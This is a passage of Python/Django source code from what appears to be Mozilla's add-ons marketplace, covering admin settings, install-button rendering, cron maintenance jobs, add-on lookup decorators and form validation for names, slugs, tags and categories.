            'fields': ('name', 'guid', 'default_locale', 'type', 'status',
                       'highest_status', 'outstanding'),
        }),
        ('Details', {
            'fields': ('summary', 'description', 'homepage', 'eula',
                       'privacy_policy', 'developer_comments', 'icon_type',
                       'the_reason', 'the_future'),
        }),
        ('Support', {
            'fields': ('support_url', 'support_email'),
        }),
        ('Stats', {
            'fields': ('average_rating', 'bayesian_rating', 'total_reviews',
                       'weekly_downloads', 'total_downloads',
                       'average_daily_downloads', 'average_daily_users',
                       'share_count'),
        }),
        ('Truthiness', {
            'fields': ('disabled_by_user', 'trusted', 'view_source',
                       'public_stats', 'prerelease', 'admin_review',
                       'site_specific', 'external_software', 'dev_agreement'),
        }),
        ('Money', {
            'fields': ('wants_contributions', 'paypal_id', 'suggested_amount',
                       'annoying'),
        }),
        ('Dictionaries', {
            'fields': ('target_locale', 'locale_disambiguation'),
        }))

    def queryset(self, request):
        # Limit the changelist to Marketplace-relevant add-on types.
        return models.Addon.objects.filter(type__in=amo.MARKETPLACE_TYPES)
class FeatureAdmin(admin.ModelAdmin):
    """Admin for featured add-ons, filterable by app and locale."""
    raw_id_fields = ('addon',)
    list_filter = ('application', 'locale')
    list_display = ('addon', 'application', 'locale')


class CategoryAdmin(admin.ModelAdmin):
    """Admin for add-on categories; the cached count is not editable."""
    raw_id_fields = ('addons',)
    list_display = ('name', 'application', 'type', 'count')
    list_filter = ('application', 'type')
    exclude = ('count',)


admin.site.register(models.Feature, FeatureAdmin)
admin.site.register(models.Addon, AddonAdmin)
admin.site.register(models.Category, CategoryAdmin)
########NEW FILE########
__FILENAME__ = buttons
from django.db.models import Q
from django.shortcuts import render
from django.utils.safestring import mark_safe
from django.views.decorators.cache import cache_page
import jingo
import jinja2
from tower import ugettext_lazy as _lazy
import amo
from amo.helpers import urlparams
from addons.models import Addon
from translations.models import Translation
def _install_button(context, addon, version=None, show_contrib=True,
                    show_warning=True, src='', collection=None, size='',
                    detailed=False, mobile=False, impala=False):
    """If version isn't given, we use the latest version."""
    request = context['request']
    app, lang = context['APP'], context['LANG']
    src = src or context.get('src') or request.GET.get('src', '')
    # A collection may arrive as an object, a uuid/id string, or via one of
    # several querystring parameters; normalise to a single value.
    collection = ((collection.uuid if hasattr(collection, 'uuid') else None)
                  or collection
                  or context.get('collection')
                  or request.GET.get('collection')
                  or request.GET.get('collection_id')
                  or request.GET.get('collection_uuid'))
    button = install_button_factory(addon, app, lang, version, show_contrib,
                                    show_warning, src, collection, size,
                                    detailed, impala)
    installed = (request.user.is_authenticated() and
                 addon.id in request.amo_user.mobile_addons)
    c = {'button': button, 'addon': addon, 'version': button.version,
         'installed': installed}
    if impala:
        template = 'addons/impala/button.html'
    elif mobile:
        template = 'addons/mobile/button.html'
    else:
        template = 'addons/button.html'
    t = jingo.render_to_string(request, template, c)
    return jinja2.Markup(t)
@jinja2.contextfunction
def install_button(context, addon, **kwargs):
    """Render the install button, plus a hidden backup-version button."""
    backup = kwargs.pop('show_backup', True)
    base = _install_button(context, addon, **kwargs)
    if backup and addon.backup_version:
        kwargs['version'] = addon.backup_version
        backup = _install_button(context, addon, **kwargs)
        # Both pieces come from _install_button (already escaped markup).
        return mark_safe('%s\n<div class="backup-button hidden '
                         'install-wrapper">%s</div>' % (base, backup))
    return base
@jinja2.contextfunction
def big_install_button(context, addon, **kwargs):
    """Render the prominent (detailed) install button with status flags."""
    from addons.helpers import statusflags
    backup = kwargs.pop('show_backup', True)
    flags = jinja2.escape(statusflags(context, addon))
    base = _install_button(context, addon, detailed=True, size='prominent',
                           **kwargs)
    params = [flags, base]
    wrap = u'<div class="install-wrapper %s">%s</div>'
    if backup and addon.backup_version:
        # Append a second (flags, button) pair for the hidden backup button.
        params.append(flags)
        params.append(_install_button(context, addon,
                                      version=addon.backup_version,
                                      detailed=True, size='prominent',
                                      **kwargs))
        wrap += '<div class="backup-button hidden install-wrapper %s">%s</div>'
    return jinja2.Markup(wrap % (tuple(params)))
@jinja2.contextfunction
def mobile_install_button(context, addon, **kwargs):
    """Render the mobile variant of the prominent install button."""
    from addons.helpers import statusflags
    b = _install_button(context, addon, detailed=True, size='prominent',
                        mobile=True, **kwargs)
    flags = jinja2.escape(statusflags(context, addon))
    s = u'<div class="install-wrapper %s">%s</div>'
    return jinja2.Markup(s % (flags, b))
def install_button_factory(*args, **kwargs):
    """Build an InstallButton, specialising its class by add-on state."""
    button = InstallButton(*args, **kwargs)
    # Order matters. We want to highlight unreviewed before featured. They
    # should be mutually exclusive, but you never know.
    classes = (('lite', LiteInstallButton),
               ('unreviewed', UnreviewedInstallButton),
               ('featured', FeaturedInstallButton))
    for pred, cls in classes:
        if getattr(button, pred, False):
            # Swap the class in place; the instance state is unchanged.
            button.__class__ = cls
            break
    button.prepare()
    return button
class InstallButton(object):
    """View-model describing how an add-on's install button renders."""

    # Class-level defaults; prepare() copies them per instance.
    button_class = ['download']
    install_class = []
    install_text = ''

    def __init__(self, addon, app, lang, version=None, show_contrib=True,
                 show_warning=True, src='', collection=None, size='',
                 detailed=False, impala=False):
        self.addon, self.app, self.lang = addon, app, lang
        self.latest = version is None
        self.version = version or addon.current_version
        self.src = src
        self.collection = collection
        self.size = size
        self.detailed = detailed
        self.impala = impala

        self.unreviewed = addon.is_unreviewed()
        self.featured = (not self.unreviewed
                         and addon.is_featured(app, lang))
        self.is_premium = addon.is_premium()
        self.is_webapp = addon.is_webapp()
        self._show_contrib = show_contrib
        self.show_contrib = (show_contrib and addon.takes_contributions
                             and addon.annoying == amo.CONTRIB_ROADBLOCK)
        self.show_warning = show_warning and self.unreviewed

    def prepare(self):
        """Called after the class is set to manage contributions."""
        # Get a copy for this instance.
        self.button_class = list(self.__class__.button_class)
        self.install_class = list(self.__class__.install_class)
        if self.show_contrib:
            try:
                self.button_class.remove('download')
            except ValueError:
                pass
            self.button_class += ['contrib', 'go']
            self.install_class.append('contrib')

        if self.size:
            self.button_class.append(self.size)
        if self.is_webapp:
            self.install_class.append('webapp')

    def attrs(self):
        # Extra HTML data-* attributes for the button element.
        rv = {}
        addon = self.addon
        if (self._show_contrib and addon.takes_contributions
            and addon.annoying == amo.CONTRIB_AFTER):
            rv['data-after'] = 'contrib'
        if addon.type == amo.ADDON_SEARCH:
            rv['data-search'] = 'true'
        return rv

    def links(self):
        # Subclasses may provide download Link objects.
        return []

    def fix_link(self, url):
        # Propagate tracking source and collection id onto download URLs.
        if self.src:
            url = urlparams(url, src=self.src)
        if self.collection:
            url = urlparams(url, collection_id=self.collection)
        return url
class FeaturedInstallButton(InstallButton):
    """Button styling for featured add-ons."""
    install_class = ['featuredaddon']
    install_text = _lazy(u'Featured', 'install_button')


class UnreviewedInstallButton(InstallButton):
    """Button styling for add-ons awaiting review."""
    install_class = ['unreviewed']
    install_text = _lazy(u'Not Reviewed', 'install_button')
    button_class = 'download caution'.split()


class LiteInstallButton(InstallButton):
    """Button styling for preliminarily-reviewed (lite) add-ons."""
    install_class = ['lite']
    button_class = ['caution']
    install_text = _lazy(u'Experimental', 'install_button')
class Link(object):
    """Simple value object for a download link shown in a button popup."""

    def __init__(self, text, url, os=None, file=None):
        self.text = text
        self.url = url
        self.os = os
        self.file = file
# Cache it for a year.
@cache_page(60 * 60 * 24 * 365)
def js(request):
    """Serve the install-button popup templates as JavaScript."""
    return render(request, 'addons/popups.html',
                  content_type='text/javascript')
def smorgasbord(request):
    """
    Gather many different kinds of tasty add-ons together.

    Great for testing install buttons.
    """
    def _compat(min, max):
        # Helper for faking compatible_apps.
        return {'min': {'version': min}, 'max': {'version': max}}

    addons = []
    normal_version = _compat('1.0', '10.0')
    older_version = _compat('1.0', '2.0')
    newer_version = _compat('9.0', '10.0')

    def all_versions(addon, base_tag):
        # Append three copies tagged current/older/newer compatibility.
        x = (('', normal_version),
             (' + older version', older_version),
             (' + newer version', newer_version))
        for extra, version in x:
            a = addon()
            a.tag = base_tag + extra
            a.compatible_apps[request.APP] = version
            addons.append(a)

    # Featured.
    featured = Addon.objects.featured(request.APP)
    addons.append(featured[0])
    addons[-1].tag = 'featured'

    normal = Addon.objects.listed(request.APP).exclude(id__in=featured)

    # Normal, Older Version, Newer Version.
    all_versions(lambda: normal[0], 'normal')

    # Unreviewed.
    exp = Addon.objects.unreviewed()
    all_versions(lambda: exp[0], 'unreviewed')

    # Multiple Platforms.
    addons.append(Addon.objects.get(id=2313))
    addons[-1].tag = 'platformer'

    # Multiple Platforms + EULA.
    addons.append(Addon.objects.get(id=2313))
    addons[-1].eula = Translation(localized_string='xxx')
    addons[-1].tag = 'platformer + eula'

    # Incompatible Platform + EULa.
    addons.append(Addon.objects.get(id=5308))
    addons[-1].eula = Translation(localized_string='xxx')
    addons[-1].tag = 'windows/linux-only + eula'

    # Incompatible Platform.
    all_versions(lambda: Addon.objects.get(id=5308), 'windows/linux-only')

    # EULA.
    eula = (Q(eula__isnull=False, eula__localized_string__isnull=False)
            & ~Q(eula__localized_string=''))
    addons.append(normal.filter(eula)[0])
    addons[-1].tag = 'eula'
    addons.append(exp.filter(eula)[0])
    addons[-1].tag = 'eula + unreviewed'

    # Contributions.
    addons.append(normal.filter(annoying=1)[0])
    addons[-1].tag = 'contrib: passive'
    addons.append(normal.filter(annoying=2)[0])
    addons[-1].tag = 'contrib: after'
    addons.append(normal.filter(annoying=3)[0])
    addons[-1].tag = 'contrib: roadblock'
    addons.append(Addon.objects.get(id=2608))
    addons[-1].tag = 'after + eula'
    addons.append(Addon.objects.get(id=8442))
    addons[-1].tag = 'roadblock + eula'

    # Other App.
    addons.append(Addon.objects.get(id=5326))
    addons[-1].tag = 'tbird'

    # Mobile.
    addons.append(Addon.objects.get(id=53476))
    addons[-1].tag = 'mobile'

    # Search Engine.
    addons.append(Addon.objects.filter(type=amo.ADDON_SEARCH)[0])
    addons[-1].tag = 'search engine'

    # Beta Version
    beta = normal.filter(versions__files__status=amo.STATUS_BETA)[0]
    beta.tag = 'beta version'

    # Future Version.
    # No versions.

    return render(request, 'addons/smorgasbord.html',
                  {'addons': addons, 'beta': beta})
########NEW FILE########
__FILENAME__ = cron
import logging
from datetime import datetime, timedelta
from django.conf import settings
from django.db import transaction
from django.db.models import F, Q
import cronjobs
import path
import waffle
from celery.task.sets import TaskSet
from celeryutils import task
import amo
from addons.models import Addon, AppSupport
from amo.decorators import write
from amo.utils import chunked
from files.models import File
log = logging.getLogger('z.cron')
task_log = logging.getLogger('z.task')
recs_log = logging.getLogger('z.recs')
# TODO(jbalogh): removed from cron on 6/27/11. If the site doesn't break,
# delete it.
@cronjobs.register
def fast_current_version():
    """Refresh current_version for add-ons with very recent file changes."""
    # Candidate for deletion - Bug 750510
    if not waffle.switch_is_active('current_version_crons'):
        return
    # Only find the really recent versions; this is called a lot.
    t = datetime.now() - timedelta(minutes=5)
    qs = Addon.objects.values_list('id')
    q1 = qs.filter(status=amo.STATUS_PUBLIC,
                   versions__files__datestatuschanged__gte=t)
    q2 = qs.filter(status__in=amo.UNREVIEWED_STATUSES,
                   versions__files__created__gte=t)
    addons = set(q1) | set(q2)
    if addons:
        _update_addons_current_version(addons)
# TODO(jbalogh): removed from cron on 6/27/11. If the site doesn't break,
# delete it.
@cronjobs.register
def update_addons_current_version():
    """Update the current_version field of the addons."""
    # Candidate for deletion - Bug 750510
    if not waffle.switch_is_active('current_version_crons'):
        return
    d = (Addon.objects.filter(disabled_by_user=False,
                              status__in=amo.VALID_STATUSES)
         .exclude(type=amo.ADDON_PERSONA).values_list('id'))

    # Fan the ids out to celery in chunks of 100.
    ts = [_update_addons_current_version.subtask(args=[chunk])
          for chunk in chunked(d, 100)]
    TaskSet(ts).apply_async()
# TODO(jbalogh): removed from cron on 6/27/11. If the site doesn't break,
# delete it.
@task(rate_limit='20/m')
def _update_addons_current_version(data, **kw):
    """Celery task: recompute current_version for each add-on id in *data*.

    *data* is a sequence of 1-tuples as produced by values_list('id').
    """
    # Candidate for deletion - Bug 750510
    if not waffle.switch_is_active('current_version_crons'):
        return
    task_log.info("[%s@%s] Updating addons current_versions." %
                  (len(data), _update_addons_current_version.rate_limit))
    for pk in data:
        try:
            addon = Addon.objects.get(pk=pk[0])
            addon.update_version()
        except Addon.DoesNotExist:
            m = "Failed to update current_version. Missing add-on: %d" % (pk)
            task_log.debug(m)
    transaction.commit_unless_managed()
def _change_last_updated(new_dates):
    """Persist new last_updated values, touching only add-ons whose stored
    value actually differs (so cache invalidation stays minimal).

    `new_dates` maps addon id -> desired last_updated datetime.
    """
    current = dict(Addon.objects.values_list('id', 'last_updated'))
    changes = {}
    for addon_id, last_updated in new_dates.items():
        # Skip ids we don't know about and values that are already correct.
        if addon_id in current and current[addon_id] != last_updated:
            changes[addon_id] = last_updated
    if not changes:
        return
    log.debug('Updating %s add-ons' % len(changes))
    # Bypass the cache and transforms; saving each addon invalidates it.
    to_update = Addon.objects.no_cache().filter(id__in=changes).no_transforms()
    for addon in to_update:
        addon.last_updated = changes[addon.id]
        addon.save()
@cronjobs.register
@write
def addon_last_updated():
    """Cron: recompute the last_updated date for every add-on."""
    # Collect the freshest last_updated per add-on from each of the
    # type-specific queries.  (Renamed from `next`, which shadowed the
    # builtin of the same name.)
    pending = {}
    for q in Addon._last_updated_queries().values():
        for addon, last_updated in q.values_list('id', 'last_updated'):
            pending[addon] = last_updated
    _change_last_updated(pending)
    # Add-ons that matched none of the queries above fall back to their
    # creation date.
    other = (Addon.objects.no_cache().filter(last_updated__isnull=True)
             .values_list('id', 'created'))
    _change_last_updated(dict(other))
@cronjobs.register
def update_addon_appsupport():
    """Cron: queue AppSupport refreshes for add-ons with stale rows."""
    # Stale: the add-on changed after its appsupport rows were built, or
    # no rows were ever built.
    stale = (Q(last_updated__gte=F('appsupport__created')) |
             Q(appsupport__created__isnull=True))
    # Search providers don't list supported apps.
    lists_apps = Q(versions__apps__isnull=False) | Q(type=amo.ADDON_SEARCH)
    has_valid_file = Q(versions__files__status__in=amo.VALID_STATUSES)
    eligible = Q(lists_apps, has_valid_file) | Q(type=amo.ADDON_PERSONA)
    ids = (Addon.objects.valid().distinct()
           .filter(stale, eligible).values_list('id', flat=True))
    subtasks = [_update_appsupport.subtask(args=[batch])
                for batch in chunked(ids, 20)]
    TaskSet(subtasks).apply_async()
@cronjobs.register
def update_all_appsupport():
    """Cron: synchronously rebuild appsupport for every known add-on."""
    from .tasks import update_appsupport
    ids = sorted(set(AppSupport.objects.values_list('addon', flat=True)))
    task_log.info('Updating appsupport for %s addons.' % len(ids))
    for idx, batch in enumerate(chunked(ids, 100)):
        # Log progress every 10 batches (i.e. every 1000 add-ons).
        if not idx % 10:
            task_log.info('[%s/%s] Updating appsupport.'
                          % (idx * 100, len(ids)))
        update_appsupport(batch)
@task
@transaction.commit_manually
def _update_appsupport(ids, **kw):
    """Celery task wrapper around tasks.update_appsupport for a chunk of
    add-on ids, run under manual transaction management."""
    from .tasks import update_appsupport
    update_appsupport(ids)
@cronjobs.register
def addons_add_slugs():
    """Give slugs to any slugless addons."""
    # Backfilling slugs shouldn't bump `modified`; disable auto_now first.
    Addon._meta.get_field('modified').auto_now = False
    slugless = Addon.objects.filter(slug=None).order_by('id')
    # Chunk it so we don't do huge queries.
    for batch in chunked(slugless, 300):
        task_log.info('Giving slugs to %s slugless addons' % len(batch))
        # save() generates and persists the slug.
        for addon in batch:
            addon.save()
@cronjobs.register
def hide_disabled_files():
    """Cron: move files of disabled add-ons out of public view.

    If an add-on or a file is disabled, it should be moved to
    GUARDED_ADDONS_PATH so it's not publicly visible.
    """
    # Deleted versions are skipped: their files are hidden when deleted
    # (and see bug 980916).
    disabled = (Q(status=amo.STATUS_DISABLED) |
                Q(version__addon__status=amo.STATUS_DISABLED) |
                Q(version__addon__disabled_by_user=True))
    ids = (File.objects
           .filter(version__deleted=False)
           .filter(disabled)
           .values_list('id', flat=True))
    for batch in chunked(ids, 300):
        files = (File.objects.no_cache().filter(id__in=batch)
                 .select_related('version'))
        for f in files:
            f.hide_disabled_file()
@cronjobs.register
def unhide_disabled_files():
    # Files are getting stuck in /guarded-addons for some reason. This job
    # makes sure guarded add-ons are supposed to be disabled.
    log = logging.getLogger('z.files.disabled')
    addon_disabled = (Q(version__addon__status=amo.STATUS_DISABLED) |
                      Q(version__addon__disabled_by_user=True))
    # Every (addon id, filename) pair that legitimately belongs in the
    # guarded directory.
    guarded = set(File.objects
                  .filter(addon_disabled | Q(status=amo.STATUS_DISABLED))
                  .values_list('version__addon', 'filename'))
    for filepath in path.path(settings.GUARDED_ADDONS_PATH).walkfiles():
        # Guarded layout is .../<addon id>/<filename>.
        addon, filename = filepath.split('/')[-2:]
        if (int(addon), filename) in guarded:
            continue
        log.warning('File that should not be guarded: %s.' % filepath)
        try:
            file_ = (File.objects.select_related('version__addon')
                     .get(version__addon=addon, filename=filename))
            file_.unhide_disabled_file()
        except File.DoesNotExist:
            log.warning('File object does not exist for: %s.' % filepath)
        except Exception:
            log.error('Could not unhide file: %s.' % filepath,
                      exc_info=True)
########NEW FILE########
__FILENAME__ = decorators
import functools
from django import http
from django.core.exceptions import PermissionDenied
from django.shortcuts import get_object_or_404
import commonware.log
from addons.models import Addon
log = commonware.log.getLogger('mkt.purchase')
def addon_view(f, qs=Addon.objects.all):
    """Decorator: resolve an addon_id/app_slug URL arg into an Addon and
    pass it to the view.  `qs` must be a zero-arg callable returning the
    queryset to look in."""
    @functools.wraps(f)
    def wrapper(request, addon_id=None, app_slug=None, *args, **kw):
        """Provides an addon given either an addon_id or app_slug."""
        assert addon_id or app_slug, 'Must provide addon_id or app_slug'

        def lookup(**filters):
            return get_object_or_404(qs(), **filters)

        if addon_id and addon_id.isdigit():
            addon = lookup(id=addon_id)
            # Redirect numeric ids to the canonical slug URL — unless the
            # slug itself is this number, which would redirect forever.
            if addon.slug != addon_id:
                url = request.path.replace(addon_id, addon.slug, 1)
                if request.GET:
                    url += '?' + request.GET.urlencode()
                return http.HttpResponsePermanentRedirect(url)
        elif addon_id:
            addon = lookup(slug=addon_id)
        elif app_slug:
            addon = lookup(app_slug=app_slug)
        return f(request, addon, *args, **kw)
    return wrapper
def addon_view_factory(qs):
    """Build an addon_view decorator bound to a particular queryset.

    Don't evaluate qs or the locale will get stuck on whatever the server
    starts with. addon_view() calls qs() with no arguments before doing
    anything, so pass a callable:
      GOOD: Addon.objects.valid
      GOOD: lambda: Addon.objects.valid().filter(type=1)
      BAD:  Addon.objects.valid()
    """
    return functools.partial(addon_view, qs=qs)
def has_purchased(f):
    """
    If the addon is premium, require a purchase.

    Must be called after addon_view decorator.
    """
    @functools.wraps(f)
    def wrapper(request, addon, *args, **kw):
        unpaid = (addon.is_premium() and
                  not addon.has_purchased(request.amo_user))
        if unpaid:
            log.info('Not purchased: %d' % addon.pk)
            raise PermissionDenied
        return f(request, addon, *args, **kw)
    return wrapper
def can_become_premium(f):
    """Check that the addon can become premium."""
    @functools.wraps(f)
    def wrapper(request, addon_id, addon, *args, **kw):
        if addon.can_become_premium():
            return f(request, addon_id, addon, *args, **kw)
        log.info('Cannot become premium: %d' % addon.pk)
        raise PermissionDenied
    return wrapper
########NEW FILE########
__FILENAME__ = forms
from django import forms
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.forms.formsets import formset_factory
import captcha.fields
import commonware.log
import happyforms
from quieter_formset.formset import BaseFormSet
from tower import ugettext as _, ungettext as ngettext
import amo
from access import acl
from addons.models import Addon, AddonCategory, BlacklistedSlug, Category
from addons.utils import reverse_name_lookup
from addons.widgets import CategoriesSelectMultiple
from amo.utils import slug_validator, slugify, sorted_groupby
from applications.models import Application
from tags.models import Tag
from translations.fields import TransField, TransTextarea
from translations.forms import TranslationFormMixin
from translations.models import Translation
from translations.widgets import TranslationTextInput
log = commonware.log.getLogger('z.addons')
def clean_name(name, instance=None):
    """Validate that `name` isn't already used by a different add-on.

    Returns the name unchanged, or raises ValidationError on a clash.
    """
    if not instance:
        log.debug('clean_name called without an instance: %s' % name)
    if instance:
        existing_id = reverse_name_lookup(name, instance.is_webapp())
    else:
        existing_id = reverse_name_lookup(name)
    # A clash only matters when the name belongs to some *other* add-on.
    if existing_id and (not instance or existing_id != instance.id):
        raise forms.ValidationError(_('This name is already in use. Please '
                                      'choose another.'))
    return name
def clean_slug(slug, instance):
    """Validate a new slug for `instance` (add-on or webapp).

    Raises ValidationError when the slug is taken or blacklisted; returns
    the slug otherwise.
    """
    slug_validator(slug, lower=False)
    slug_field = 'app_slug' if instance.is_webapp() else 'slug'

    if slug != getattr(instance, slug_field):
        if Addon.objects.filter(**{slug_field: slug}).exists():
            raise forms.ValidationError(
                _('This slug is already in use. Please choose another.'))

        if BlacklistedSlug.blocked(slug):
            # Interpolate *after* translation.  Formatting inside _() looks
            # up the already-formatted string, which never matches the
            # extracted msgid, so the message was never translated.
            raise forms.ValidationError(
                _('The slug cannot be "%s". Please choose another.') % slug)

    return slug
def clean_tags(request, tags):
    """Validate and normalize a comma-separated tag string.

    Returns the cleaned set of tag slugs.  Raises ValidationError for
    blacklisted tags, restricted tags (non-admins only), too many tags,
    or tags that are too long or too short.
    """
    target = [slugify(t, spaces=True, lower=True) for t in tags.split(',')]
    target = set(filter(None, target))

    min_len = amo.MIN_TAG_LENGTH
    max_len = Tag._meta.get_field('tag_text').max_length
    max_tags = amo.MAX_TAGS
    total = len(target)

    blacklisted = (Tag.objects.values_list('tag_text', flat=True)
                   .filter(tag_text__in=target, blacklisted=True))
    if blacklisted:
        # L10n: {0} is a single tag or a comma-separated list of tags.
        msg = ngettext('Invalid tag: {0}', 'Invalid tags: {0}',
                       len(blacklisted)).format(', '.join(blacklisted))
        raise forms.ValidationError(msg)

    restricted = (Tag.objects.values_list('tag_text', flat=True)
                  .filter(tag_text__in=target, restricted=True))
    if not acl.action_allowed(request, 'Addons', 'Edit'):
        if restricted:
            # L10n: {0} is a single tag or a comma-separated list of tags.
            msg = ngettext('"{0}" is a reserved tag and cannot be used.',
                           '"{0}" are reserved tags and cannot be used.',
                           len(restricted)).format('", "'.join(restricted))
            raise forms.ValidationError(msg)
    else:
        # Admin's restricted tags don't count towards the limit.
        total = len(target - set(restricted))

    if total > max_tags:
        num = total - max_tags
        msg = ngettext('You have {0} too many tags.',
                       'You have {0} too many tags.', num).format(num)
        raise forms.ValidationError(msg)

    if any(t for t in target if len(t) > max_len):
        # Interpolate *after* translation: formatting inside _() breaks the
        # gettext msgid lookup, so this message was never translated.
        raise forms.ValidationError(
            _('All tags must be %s characters '
              'or less after invalid characters are removed.') % max_len)

    if any(t for t in target if len(t) < min_len):
        msg = ngettext("All tags must be at least {0} character.",
                       "All tags must be at least {0} characters.",
                       min_len).format(min_len)
        raise forms.ValidationError(msg)

    return target
class AddonFormBase(TranslationFormMixin, happyforms.ModelForm):
    """Shared base for the add-on edit forms: stashes the request and
    provides the common slug/tag cleaning hooks."""

    def __init__(self, *args, **kw):
        # Views must pass request=...; it's needed for permission checks.
        self.request = kw.pop('request')
        super(AddonFormBase, self).__init__(*args, **kw)

    class Meta:
        # Fixed a typo: this read `models = Addon`, which left the
        # ModelForm without a model.  Subclasses redefine Meta, which is
        # why the bug went unnoticed.
        model = Addon
        fields = ('name', 'slug', 'summary', 'tags')

    def clean_slug(self):
        return clean_slug(self.cleaned_data['slug'], self.instance)

    def clean_tags(self):
        return clean_tags(self.request, self.cleaned_data['tags'])

    def get_tags(self, addon):
        """Return the tag strings visible to the current user; admins also
        see restricted tags."""
        if acl.action_allowed(self.request, 'Addons', 'Edit'):
            return list(addon.tags.values_list('tag_text', flat=True))
        else:
            return list(addon.tags.filter(restricted=False)
                        .values_list('tag_text', flat=True))
class AddonFormBasic(AddonFormBase):
    """Edit form for an add-on's basic fields (name/slug/summary/tags).

    Webapps are edited through the same form: their `app_slug` is surfaced
    under the "slug" field name so the existing JS keeps working.
    """
    name = TransField(max_length=50)
    slug = forms.CharField(max_length=30)
    summary = TransField(widget=TransTextarea(attrs={'rows': 4}),
                         max_length=250)
    tags = forms.CharField(required=False)

    class Meta:
        model = Addon
        fields = ('name', 'slug', 'summary', 'tags')

    def __init__(self, *args, **kw):
        # Force the form to use app_slug if this is a webapp. We want to keep
        # this under "slug" so all the js continues to work.
        if kw['instance'].is_webapp():
            kw.setdefault('initial', {})['slug'] = kw['instance'].app_slug
        super(AddonFormBasic, self).__init__(*args, **kw)
        self.fields['tags'].initial = ', '.join(self.get_tags(self.instance))
        # Do not simply append validators, as validators will persist between
        # instances.
        validate_name = lambda x: clean_name(x, self.instance)
        name_validators = list(self.fields['name'].validators)
        name_validators.append(validate_name)
        self.fields['name'].validators = name_validators

    def save(self, addon, commit=False):
        """Save the form, diffing tags so only actual additions/removals
        hit the database."""
        tags_new = self.cleaned_data['tags']
        tags_old = [slugify(t, spaces=True) for t in self.get_tags(addon)]
        # Add new tags.
        for t in set(tags_new) - set(tags_old):
            Tag(tag_text=t).save_tag(addon)
        # Remove old tags.
        for t in set(tags_old) - set(tags_new):
            Tag(tag_text=t).remove_tag(addon)
        # We ignore `commit`, since we need it to be `False` so we can save
        # the ManyToMany fields on our own.
        addonform = super(AddonFormBasic, self).save(commit=False)
        addonform.save()
        return addonform

    def _post_clean(self):
        """For webapps, temporarily swap 'slug' for 'app_slug' during model
        validation so the right model field gets updated."""
        if self.instance.is_webapp():
            # Switch slug to app_slug in cleaned_data and self._meta.fields so
            # we can update the app_slug field for webapps.
            try:
                self._meta.fields = list(self._meta.fields)
                slug_idx = self._meta.fields.index('slug')
                data = self.cleaned_data
                if 'slug' in data:
                    data['app_slug'] = data.pop('slug')
                self._meta.fields[slug_idx] = 'app_slug'
                super(AddonFormBasic, self)._post_clean()
            finally:
                # Always restore 'slug' — _meta is shared class state.
                self._meta.fields[slug_idx] = 'slug'
        else:
            super(AddonFormBasic, self)._post_clean()
class AppFormBasic(AddonFormBasic):
    """Form to override name length for apps."""
    # Apps allow longer names than the 50-char add-on limit.
    name = TransField(max_length=128)
class ApplicationChoiceField(forms.ModelChoiceField):
    """ModelChoiceField that labels each Application by its numeric id."""

    def label_from_instance(self, obj):
        return obj.id
class CategoryForm(forms.Form):
    """Per-application category picker for an add-on.

    `application` is None for webapps (which aren't app-specific).
    """
    application = ApplicationChoiceField(Application.objects.all(),
                                         widget=forms.HiddenInput,
                                         required=False)
    categories = forms.ModelMultipleChoiceField(
        queryset=Category.objects.all(), widget=CategoriesSelectMultiple)

    def save(self, addon):
        """Diff old vs. new categories for this form's application and
        apply only the additions/removals."""
        application = self.cleaned_data['application']
        categories_new = self.cleaned_data['categories']
        # Pick out the categories belonging to this form's application
        # (or the app-less bucket when application is None).
        categories_old = [cats for app, cats in addon.app_categories if
                          (app and application and app.id == application.id) or
                          (not app and not application)]
        if categories_old:
            categories_old = categories_old[0]
        # Add new categories.
        for c in set(categories_new) - set(categories_old):
            AddonCategory(addon=addon, category=c).save()
        # Remove old categories.
        for c in set(categories_old) - set(categories_new):
            AddonCategory.objects.filter(addon=addon, category=c).delete()

    def clean_categories(self):
        """Enforce the featured-lock, count limit and "misc is exclusive"
        rules."""
        categories = self.cleaned_data['categories']
        total = categories.count()
        max_cat = amo.MAX_CATEGORIES
        # `disabled` is set by BaseCategoryFormSet when the add-on is
        # featured for this application.
        if getattr(self, 'disabled', False) and total:
            if categories[0].type == amo.ADDON_WEBAPP:
                raise forms.ValidationError(_('Categories cannot be changed '
                    'while your app is featured for this application.'))
            else:
                raise forms.ValidationError(_('Categories cannot be changed '
                    'while your add-on is featured for this application.'))
        if total > max_cat:
            # L10n: {0} is the number of categories.
            raise forms.ValidationError(ngettext(
                'You can have only {0} category.',
                'You can have only {0} categories.',
                max_cat).format(max_cat))
        has_misc = filter(lambda x: x.misc, categories)
        if has_misc and total > 1:
            raise forms.ValidationError(
                _('The miscellaneous category cannot be combined with '
                  'additional categories.'))
        return categories
class BaseCategoryFormSet(BaseFormSet):
    """Formset pairing one CategoryForm per application the add-on
    supports (a single app-less form for webapps)."""

    def __init__(self, *args, **kw):
        self.addon = kw.pop('addon')
        self.request = kw.pop('request', None)
        super(BaseCategoryFormSet, self).__init__(*args, **kw)
        self.initial = []
        # Webapps get one form keyed on app=None; add-ons get one form per
        # compatible application, in id order.
        if self.addon.type == amo.ADDON_WEBAPP:
            apps = [None]
        else:
            apps = sorted(self.addon.compatible_apps.keys(),
                          key=lambda x: x.id)
        # Drop any apps that don't have appropriate categories.
        qs = Category.objects.filter(type=self.addon.type)
        if self.addon.type != amo.ADDON_WEBAPP:
            qs = qs.filter(application__in=[a.id for a in apps])
        # Map application id -> its category list.
        app_cats = dict((k, list(v)) for k, v in
                        sorted_groupby(qs, 'application_id'))
        for app in list(apps):
            if app and not app_cats.get(app.id):
                apps.remove(app)
        if not app_cats:
            apps = []
        for app in apps:
            cats = dict(self.addon.app_categories).get(app, [])
            self.initial.append({'categories': [c.id for c in cats]})
        # Wire each form up to its application: choices, initial values and
        # the featured-lock flag.
        for app, form in zip(apps, self.forms):
            key = app.id if app else None
            form.request = self.request
            form.initial['application'] = key
            form.app = app
            cats = sorted(app_cats[key], key=lambda x: x.name)
            form.fields['categories'].choices = [(c.id, c.name) for c in cats]
            # If this add-on is featured for this application, category
            # changes are forbidden.
            if not acl.action_allowed(self.request, 'Addons', 'Edit'):
                form.disabled = (app and self.addon.is_featured(app))

    def save(self):
        # Each form knows its own application; just delegate.
        for f in self.forms:
            f.save(self.addon)
# No extra blank forms: BaseCategoryFormSet builds exactly one form per
# application in __init__.
CategoryFormSet = formset_factory(form=CategoryForm,
                                  formset=BaseCategoryFormSet, extra=0)
def icons():
    """
    Generates a list of tuples for the default icons for add-ons,
    in the format (pseudo-mime-type, description).
    """
    icons = [('image/jpeg', 'jpeg'), ('image/png', 'png'), ('', 'default')]
